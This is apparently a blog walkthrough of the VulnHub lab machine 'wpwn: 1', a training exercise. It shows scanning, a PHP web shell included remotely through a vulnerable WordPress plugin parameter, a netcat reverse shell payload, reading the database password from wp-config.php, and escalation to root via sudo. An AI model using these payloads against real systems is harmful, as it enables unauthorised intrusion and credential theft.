al1z4deh.medium.com

VulnHub: wpwn: 1

Al1z4deh:~# echo "Welcome"
3–4 minutes

Al1z4deh:~# echo "Welcome"

Today we will take a look at Vulnhub: wpwn: 1. My goal in sharing this writeup is to show you the way if you are in trouble. Please try to understand each step and take notes.

Press enter or click to view image in full size

  • Network scan
sudo nmap -p- -sCV --open 192.168.213.123PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 59:b7:db:e0:ba:63:76:af:d0:20:03:11:e1:3c:0e:34 (RSA)
|   256 2e:20:56:75:84:ca:35:ce:e3:6a:21:32:1f:e7:f5:9a (ECDSA)
|_  256 0d:02:83:8b:1a:1c:ec:0f:ae:74:cc:7b:da:12:89:9e (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
  • Gobuster
gobuster dir -u http://192.168.213.123  -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.213.123
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/06/05 18:50:16 Starting gobuster in directory enumeration mode
===============================================================
/wordpress            (Status: 301) [Size: 322]
  • Wpscan
wpscan --url http://192.168.213.123/wordpress

Press enter or click to view image in full size

  • Reverse Shell
Command: nano exploit.php<pre>system($_GET[rce])</pre>Command: curl 'http://192.168.213.123/wordpress/wp-admin/admin-post.php?rce=id&swp_debug=load_options&swp_url=http://192.168.49.213:1337/exploit.php'

Press enter or click to view image in full size

http://192.168.213.123/wordpress/wp-admin/admin-post.php?rce=nc%20-e%20/bin/bash%20Your_IP%204242&swp_debug=load_options&swp_url=http://192.168.49.213:1337/exploit.php# Change IP
  • Takis

After login

Command: script /dev/null -c bashCommand: export TERM=xtermctrl+z                            Command: stty raw -echo ; fg                  
           Command: reset

Takis’s password

Get Al1z4deh:~# echo "Welcome"’s stories in your inbox

Join Medium for free to get updates from this writer.

We see the password in the wp-config.php file in the /var/www/html/ wordpress folder.

Command: cat wp-config.php

Press enter or click to view image in full size

Command: su Takis
  • Root
Command: sudo -l(ALL) NOPASSWD: ALLCommand: sudo su

Press enter or click to view image in full size

And now we are the root

“If you have any questions or comments, please do not hesitate to write. Have a good days”